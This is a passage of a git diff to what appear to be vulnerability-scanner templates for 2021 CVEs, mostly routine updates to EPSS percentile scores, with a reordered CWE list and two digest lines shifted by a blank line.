cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index bfa89320e2..dfcee2aca7 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-30151 cwe-id: CWE-79 epss-score: 0.00435 - epss-percentile: 0.71821 + epss-percentile: 0.71845 cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml index bc61c057e4..18095bc6b0 100644 --- a/http/cves/2021/CVE-2021-3017.yaml +++ b/http/cves/2021/CVE-2021-3017.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-3017 epss-score: 0.0151 - epss-percentile: 0.8552 + epss-percentile: 0.85527 cpe: cpe:2.3:o:intelbras:win_300_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index 2c0cc5c3cf..f85581ec42 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-30175 cwe-id: CWE-89 epss-score: 0.04703 - epss-percentile: 0.91709 + epss-percentile: 0.91718 cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index 3c885a7bed..ad82762882 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-3019 cwe-id: CWE-22 epss-score: 0.01044 - epss-percentile: 0.8235 + epss-percentile: 0.82361 cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml index 252e2512bf..ac12a55eee 100644 --- a/http/cves/2021/CVE-2021-30213.yaml +++ b/http/cves/2021/CVE-2021-30213.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-30213 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40941 + epss-percentile: 0.40964 cpe: cpe:2.3:a:eng:knowage:7.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index 8cdddf1b26..1ef76b3be9 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-3110 cwe-id: CWE-89 epss-score: 0.95398 - epss-percentile: 0.99147 + epss-percentile: 0.99148 cpe: cpe:2.3:a:prestashop:prestashop:1.7.7.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-31249.yaml b/http/cves/2021/CVE-2021-31249.yaml index efe6d25f66..eec352cd6a 100644 --- a/http/cves/2021/CVE-2021-31249.yaml +++ b/http/cves/2021/CVE-2021-31249.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-31249 cwe-id: CWE-74 epss-score: 0.00331 - epss-percentile: 0.6789 + epss-percentile: 0.67916 cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml index 516d6d1744..ecd41f750f 100644 --- a/http/cves/2021/CVE-2021-31537.yaml +++ b/http/cves/2021/CVE-2021-31537.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-31537 cwe-id: CWE-79 epss-score: 0.00271 - epss-percentile: 0.64272 + epss-percentile: 0.64307 cpe: cpe:2.3:a:sisinformatik:sis-rewe_go:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index 7d00ca22cf..9a36f82d60 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-31581 cwe-id: CWE-312,CWE-269 epss-score: 0.00285 - epss-percentile: 0.65213 + epss-percentile: 0.6525 cpe: cpe:2.3:a:akkadianlabs:ova_appliance:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index 762a5aab83..94170c4d9f 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-31589 cwe-id: CWE-79 epss-score: 0.00286 - epss-percentile: 0.65282 + epss-percentile: 0.65318 cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index a104ce7c0d..d84401487f 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-31602 cwe-id: CWE-287 epss-score: 0.39689 - epss-percentile: 0.96848 + epss-percentile: 0.9685 cpe: cpe:2.3:a:hitachi:vantara_pentaho:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index a8cded183b..299dce0ab9 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-31682 cwe-id: CWE-79 epss-score: 0.00377 - epss-percentile: 0.69794 + epss-percentile: 0.6982 cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index f207e048b1..5e1186db67 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-31805 cwe-id: CWE-917 epss-score: 0.06452 - epss-percentile: 0.92913 + epss-percentile: 0.92916 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml index 8b25272c1c..91737b2bff 100644 --- a/http/cves/2021/CVE-2021-31856.yaml +++ b/http/cves/2021/CVE-2021-31856.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-31856 cwe-id: CWE-89 epss-score: 0.05701 - epss-percentile: 0.92492 + epss-percentile: 0.92498 cpe: cpe:2.3:a:layer5:meshery:0.5.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index 2e95fcf10d..e4c8b83be2 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-31862 cwe-id: CWE-79 epss-score: 0.00141 - epss-percentile: 0.49651 + epss-percentile: 0.49669 cpe: cpe:2.3:a:sysaid:sysaid:20.4.74:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32030.yaml b/http/cves/2021/CVE-2021-32030.yaml index 7cd7a56330..c109ad7b7b 100644 --- a/http/cves/2021/CVE-2021-32030.yaml +++ b/http/cves/2021/CVE-2021-32030.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-32030 cwe-id: CWE-287 epss-score: 0.61922 - epss-percentile: 0.97453 + epss-percentile: 0.97455 cpe: cpe:2.3:o:asus:gt-ac2900_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32172.yaml b/http/cves/2021/CVE-2021-32172.yaml index fdd19b6cf3..90d01d0f1f 100644 --- a/http/cves/2021/CVE-2021-32172.yaml +++ b/http/cves/2021/CVE-2021-32172.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-32172 cwe-id: CWE-862 epss-score: 0.26193 - epss-percentile: 0.96192 + epss-percentile: 0.96195 cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index f8ab88bccc..80b3fc30cd 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-3223 cwe-id: CWE-22 epss-score: 0.11532 - epss-percentile: 0.94634 + epss-percentile: 0.94637 cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-32305.yaml b/http/cves/2021/CVE-2021-32305.yaml index 1e919801e7..674b4521e3 100644 --- a/http/cves/2021/CVE-2021-32305.yaml +++ b/http/cves/2021/CVE-2021-32305.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-32305 cwe-id: CWE-78 epss-score: 0.9665 - epss-percentile: 0.99507 + epss-percentile: 0.99508 cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml index 16bfd99789..0beb82a7d1 100644 --- a/http/cves/2021/CVE-2021-32618.yaml +++ b/http/cves/2021/CVE-2021-32618.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-32618 cwe-id: CWE-601 epss-score: 0.00104 - epss-percentile: 0.42305 + epss-percentile: 0.42327 cpe: cpe:2.3:a:flask-security_project:flask-security:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32789.yaml b/http/cves/2021/CVE-2021-32789.yaml index 062f5690d4..65e5194e45 100644 --- a/http/cves/2021/CVE-2021-32789.yaml +++ b/http/cves/2021/CVE-2021-32789.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-32789 cwe-id: CWE-89 epss-score: 0.02288 - epss-percentile: 0.88464 + epss-percentile: 0.88468 cpe: cpe:2.3:a:automattic:woocommerce_blocks:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index e12edd4915..951eaf4854 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-32819 cwe-id: CWE-200,NVD-CWE-noinfo epss-score: 0.90688 - epss-percentile: 0.98494 + epss-percentile: 0.98495 cpe: cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index 75f921423d..216faa8d9f 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-32820 cwe-id: CWE-200,CWE-94 epss-score: 0.00929 - epss-percentile: 0.81254 + epss-percentile: 0.81266 cpe: cpe:2.3:a:express_handlebars_project:express_handlebars:*:*:*:*:*:node.js:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fbd7d59f8ece9b72e8a0c58ff02c77e36fe0f745ad6de5cd3e505be4b4461b5f022100856d964f3d265ec414cd65010e9107d86c180f2e1eb6b7ad9a17dd3013312584:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100fbd7d59f8ece9b72e8a0c58ff02c77e36fe0f745ad6de5cd3e505be4b4461b5f022100856d964f3d265ec414cd65010e9107d86c180f2e1eb6b7ad9a17dd3013312584:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index 5713d5539c..8100864816 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-32853 cwe-id: CWE-79 epss-score: 0.00585 - epss-percentile: 0.75763 + epss-percentile: 0.75786 cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index 5e4c167fa4..9ca5f8c68a 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-3293 cwe-id: CWE-22 epss-score: 0.003 - epss-percentile: 0.66097 + epss-percentile: 0.66132 cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index cd4cfde971..6afd478f17 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-3297 cwe-id: CWE-287 epss-score: 0.18886 - epss-percentile: 0.95672 + epss-percentile: 0.95675 cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\(aagu.2\)c0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index 4f127615f9..8b60c75e94 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-33044 cwe-id: CWE-287 epss-score: 0.30474 - epss-percentile: 0.96437 + epss-percentile: 0.96439 cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml index 9e10477f7f..711fe4be88 100644 --- a/http/cves/2021/CVE-2021-33221.yaml +++ b/http/cves/2021/CVE-2021-33221.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-33221 cwe-id: CWE-306 epss-score: 0.25994 - epss-percentile: 0.96177 + epss-percentile: 0.96181 cpe: cpe:2.3:a:commscope:ruckus_iot_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33564.yaml b/http/cves/2021/CVE-2021-33564.yaml index 955fea45d1..a0ef2bf9ce 100644 --- a/http/cves/2021/CVE-2021-33564.yaml +++ b/http/cves/2021/CVE-2021-33564.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-33564 cwe-id: CWE-88 epss-score: 0.07998 - epss-percentile: 0.93578 + epss-percentile: 0.93583 cpe: cpe:2.3:a:dragonfly_project:dragonfly:*:*:*:*:*:ruby:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml index ece782b902..b3cf873f2e 100644 --- a/http/cves/2021/CVE-2021-3374.yaml +++ b/http/cves/2021/CVE-2021-3374.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-3374 cwe-id: CWE-22 epss-score: 0.00175 - epss-percentile: 0.545 + epss-percentile: 0.54522 cpe: cpe:2.3:a:rstudio:shiny_server:*:*:*:*:pro:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index 1b53ebb49e..d716f2ae68 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-3377 cwe-id: CWE-79 epss-score: 0.00121 - epss-percentile: 0.46124 + epss-percentile: 0.46137 cpe: cpe:2.3:a:ansi_up_project:ansi_up:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3378.yaml b/http/cves/2021/CVE-2021-3378.yaml index 60b18c2d9c..fb1ce4fc0c 100644 --- a/http/cves/2021/CVE-2021-3378.yaml +++ b/http/cves/2021/CVE-2021-3378.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-3378 cwe-id: CWE-434 epss-score: 0.18935 - epss-percentile: 0.95674 + epss-percentile: 0.95677 cpe: cpe:2.3:a:fortilogger:fortilogger:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml index af60360841..146c35f6ed 100644 --- a/http/cves/2021/CVE-2021-33807.yaml +++ b/http/cves/2021/CVE-2021-33807.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-33807 cwe-id: CWE-22 epss-score: 0.01682 - epss-percentile: 0.86294 + epss-percentile: 0.86298 cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index f74f88cf22..6e594bd612 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-33851 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28838 + epss-percentile: 0.28844 cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index 787ad3a659..3d9aa9fbb4 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-33904 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.5126 + epss-percentile: 0.51287 cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml index 1d3d6741f8..801c4a47a8 100644 --- a/http/cves/2021/CVE-2021-34370.yaml +++ b/http/cves/2021/CVE-2021-34370.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-34370 cwe-id: CWE-79 epss-score: 0.00183 - epss-percentile: 0.55413 + epss-percentile: 0.55435 cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 943b2621fd..faec2bdad1 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-34473 cwe-id: CWE-918 epss-score: 0.97344 - epss-percentile: 0.99858 + epss-percentile: 0.99859 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34621.yaml b/http/cves/2021/CVE-2021-34621.yaml index 567b4d4160..6d2ce685f0 100644 --- a/http/cves/2021/CVE-2021-34621.yaml +++ b/http/cves/2021/CVE-2021-34621.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-34621 cwe-id: CWE-306,CWE-269 epss-score: 0.7888 - epss-percentile: 0.9792 + epss-percentile: 0.97921 cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index f51099b057..0741546853 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-34640 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45134 + epss-percentile: 0.4515 cpe: cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index 31d3318ea0..8ff871b6be 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-34643 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45134 + epss-percentile: 0.4515 cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml index fddefc7c8f..770d508138 100644 --- a/http/cves/2021/CVE-2021-34805.yaml +++ b/http/cves/2021/CVE-2021-34805.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-34805 cwe-id: CWE-22 epss-score: 0.03335 - epss-percentile: 0.90277 + epss-percentile: 0.90282 cpe: cpe:2.3:a:land-software:faust_iserver:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index a4c4149d5a..1ed0154603 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-35250 cwe-id: CWE-22 epss-score: 0.04377 - epss-percentile: 0.91397 + epss-percentile: 0.91402 cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index f322391e08..4dbcf74ed3 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-35265 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47051 + epss-percentile: 0.4706 cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-35323.yaml b/http/cves/2021/CVE-2021-35323.yaml index 696e538a4a..454607f839 100644 --- a/http/cves/2021/CVE-2021-35323.yaml +++ b/http/cves/2021/CVE-2021-35323.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-35323 cwe-id: CWE-79 epss-score: 0.00183 - epss-percentile: 0.55413 + epss-percentile: 0.55435 cpe: cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index 309d3fbda4..121bd1638b 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-35336 cwe-id: CWE-1188 epss-score: 0.08605 - epss-percentile: 0.93789 + epss-percentile: 0.93794 cpe: cpe:2.3:o:tieline:ip_audtio_gateway_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index c788667296..d2035bbbc1 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-35380 cwe-id: CWE-22 epss-score: 0.19555 - epss-percentile: 0.9573 + epss-percentile: 0.95733 cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 83139894ae..b5b0c601e1 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2021-35464 cwe-id: CWE-502 epss-score: 0.97347 - epss-percentile: 0.9986 + epss-percentile: 0.99861 cpe: cpe:2.3:a:forgerock:am:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index 3d9b10c68c..08a4e6da6e 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-35488 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.50128 + epss-percentile: 0.50151 cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index bdfb6a931e..a8d41105dd 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-35587 cwe-id: CWE-502 epss-score: 0.95643 - epss-percentile: 0.99208 + epss-percentile: 0.99209 cpe: cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index 7659b4cd4a..6775150eaf 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-3577 - cwe-id: CWE-78,CWE-863 + cwe-id: CWE-863,CWE-78 epss-score: 0.96855 - epss-percentile: 0.9959 + epss-percentile: 0.99592 cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210091241a75d3315d716ce578346a7d74e5f4e9cde56d38a04cefbfbd96c963627a02203499344ac3f186ea546e35c9def2cbf38f8138e6629112700e820c44b7c4d032:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210091241a75d3315d716ce578346a7d74e5f4e9cde56d38a04cefbfbd96c963627a02203499344ac3f186ea546e35c9def2cbf38f8138e6629112700e820c44b7c4d032:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index a5ab6c071f..ae66db91b7 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-36260 cwe-id: CWE-78 epss-score: 0.97502 - epss-percentile: 0.99976 + epss-percentile: 0.99975 cpe: cpe:2.3:o:hikvision:ds-2cd2026g2-iu\/sl_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index ae254e49a2..9764589479 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-36356 cwe-id: CWE-434 epss-score: 0.84045 - epss-percentile: 0.98122 + epss-percentile: 0.98124 cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index 2dc9118543..2239d1d5f4 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-36380 cwe-id: CWE-78 epss-score: 0.97108 - epss-percentile: 0.99703 + epss-percentile: 0.99704 cpe: cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index be57c4d489..db1b1403a0 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-36450 cwe-id: CWE-79 epss-score: 0.0033 - epss-percentile: 0.67842 + epss-percentile: 0.67867 cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml index 8cb2516d40..b22cb68dd0 100644 --- a/http/cves/2021/CVE-2021-3654.yaml +++ b/http/cves/2021/CVE-2021-3654.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-3654 cwe-id: CWE-601 epss-score: 0.92596 - epss-percentile: 0.98712 + epss-percentile: 0.98713 cpe: cpe:2.3:a:openstack:nova:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git 